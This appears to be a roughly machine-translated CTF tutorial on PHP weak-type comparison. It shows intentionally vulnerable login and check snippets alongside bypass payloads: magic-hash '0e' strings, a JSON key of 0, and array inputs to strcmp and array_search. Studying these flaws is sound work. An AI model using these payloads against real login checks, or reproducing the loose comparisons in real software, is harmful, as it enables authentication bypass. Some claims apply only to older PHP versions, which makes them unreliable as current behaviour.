The content shared with you in this article is about weak type conversion in php. The content is of great reference value. I hope it can help friends in need.
In the recent CTF competition, the question of PHP weak types has appeared more than once. I would like to summarize the knowledge about PHP weak types and how to bypass them
There are two comparison symbols == and ===
1 <?php 2 $a = $b ; 3 $a===$b ; 4 ?>
=== in php. When comparing, it will first determine whether the types of the two strings are equal, and then Comparison
== When comparing, the string type will be converted to the same type first, and then compared
如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行
It is clearly stated here that if a value is compared with a string When comparing, the string will be converted into a numerical value
1 <?php 2 var_dump("admin"==0); //true 3 var_dump("1admin"==1); //true 4 var_dump("admin1"==1) //false 5 var_dump("admin1"==0) //true 6 var_dump("0e123456"=="0e4456789"); //true 7 ?> //上述代码可自行测试
1 Observe the above code, "admin"==0 When compared, admin will be converted into a numerical value, forced conversion, because admin is a string, The result of the conversion is that 0 is naturally equal to 0
2 "1admin"==1 When compared, 1admin will be converted into a numerical value, and the result is 1, but "admin1"==1 is equal to an error, that is, "admin1" is Converted to 0, why? ? 3 "0e123456"=="0e456789" When compared with each other, strings such as 0e will be recognized as numbers under the Science and Technology Law. No matter how many times 0 is raised, it is zero, so they are equal
For the above question, I checked the PHP manual
When a string is treated as a numerical value, the result and type are as follows: If the string does not contain '.', 'e', 'E' and its numerical value is within the range of integer
The string is treated as an int to obtain the value. In all other cases, it is treated as a float to obtain the value. The starting part of the string determines Its value is used if the string begins with a legal numeric value, otherwise its value is 0.
1 <?php 2 $test=1 + "10.5"; // $test=11.5(float) 3 $test=1+"-1.3e3"; //$test=-1299(float) 4 $test=1+"bob-1.3e3";//$test=1(int) 5 $test=1+"2admin";//$test=3(int) 6 $test=1+"admin2";//$test=1(int) 7 ?>
So this explains the reason why "admin1"==1 =>False
md5 bypass (Hash comparison defect)
1 <?php 2 if (isset($_GET['Username']) && isset($_GET['password'])) { 3 $logined = true; 4 $Username = $_GET['Username']; 5 $password = $_GET['password']; 6 7 if (!ctype_alpha($Username)) {$logined = false;} 8 if (!is_numeric($password) ) {$logined = false;} 9 if (md5($Username) != md5($password)) {$logined = false;} 10 if ($logined){ 11 echo "successful"; 12 }else{ 13 echo "login failed!"; 14 } 15 } 16 ?>
The main idea of the question is to input a string and a numeric type, and their md5 values are equal, you can successfully execute the next statement
Introducing a batch of md5 strings starting with 0e mentioned above I've been there before, 0e will be treated as scientific notation when comparing, so no matter what comes after 0e, the power of 0 is still 0. md5('240610708') == md5('QNKCDZO')Successfully bypassed!
QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514
json bypass
<?php if (isset($_POST['message'])) { $message = json_decode($_POST['message']); $key ="*********"; if ($message->key == $key) { echo "flag"; } else { echo "fail"; } } else{ echo "~~~~"; } ?>
Enter a json type string, json_decode The function decrypts into an array and determines whether the value of key in the array is equal to the value of $key, but we don’t know the value of $key. But we can use the form 0=="admin" to bypass it
Final payload message={"key":0}
array_search is_array bypass
1 <?php 2 if(!is_array($_GET['test'])){exit();} 3 $test=$_GET['test']; 4 for($i=0;$i<count($test);$i++){ 5 if($test[$i]==="admin"){ 6 echo "error"; 7 exit(); 8 } 9 $test[$i]=intval($test[$i]); 10 } 11 if(array_search("admin",$test)===0){ 12 echo "flag"; 13 } 14 else{ 15 echo "false"; 16 } 17 ?>
The above is one written by myself, first judge the incoming Is it an array, then loop through each value in the array, and each value in the array cannot be equal to admin, and convert each value into int type, and then determine whether the incoming array contains admin, if so, return flag
payload test[]=0 can be bypassed
The following is the official manual’s introduction to array_search
mixed array_search ( mixed $needle , array $haystack [, bool $strict = false ] )
$needle, $haystack is required, $strict is optional Function judgment$ The value in haystack exists in $needle. If it exists, the key value of the value is returned. The third parameter defaults to false. If set to true, strict filtering will be performed.
1 <?php 2 $a=array(0,1); 3 var_dump(array_search("admin",$a)); // int(0) => 返回键值0 4 var_dump(array_seach("1admin",$a)); // int(1) ==>返回键值1 5 ?>
array_search function is similar to ==, that is, $ a=="admin" is of course $a=0. Of course, if the third parameter is true, it cannot bypass the
strcmp vulnerability. Bypass php -v <5.3
1 <?php 2 $password="***************" 3 if(isset($_POST['password'])){ 4 5 if (strcmp($_POST['password'], $password) == 0) { 6 echo "Right!!!login success";n 7 exit(); 8 } else { 9 echo "Wrong password.."; 10 } 11 ?>
strcmp is Compare two strings. If str1
We don’t know the value of $password. The question requires strcmp to judge. The accepted value must be equal to $password. The expected type passed in by strcmp is a string type. What will happen if an array is passed in?
We pass in password[]=xxx and can be bypassed because of the function If an incompatible type is received, an error will occur, but it will still be judged to be equal
payload: password[]=xxx
switch bypass
1 <?php 2 $a="4admin"; 3 switch ($a) { 4 case 1: 5 echo "fail1"; 6 break; 7 case 2: 8 echo "fail2"; 9 break; 10 case 3: 11 echo "fail3"; 12 break; 13 case 4: 14 echo "sucess"; //结果输出success; 15 break; 16 default: 17 echo "failall"; 18 break; 19 } 20 ?>
This principle is the same as the previous one Similar, I won’t explain it in detail
These PHP weak types are just the tip of the iceberg. The above has verified the importance of code audit
Related recommendations:
Usage examples of keyword var in PHP
php queue processing: PHP message queue implementation principle (picture and text)
The above is the detailed content of Implementation of weak type conversion in php. For more information, please follow other related articles on the PHP Chinese website!